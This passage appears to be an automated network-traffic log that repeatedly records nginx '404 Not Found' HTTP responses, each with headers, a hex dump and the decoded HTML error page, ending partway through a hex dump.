Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:10 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:27 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:43 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 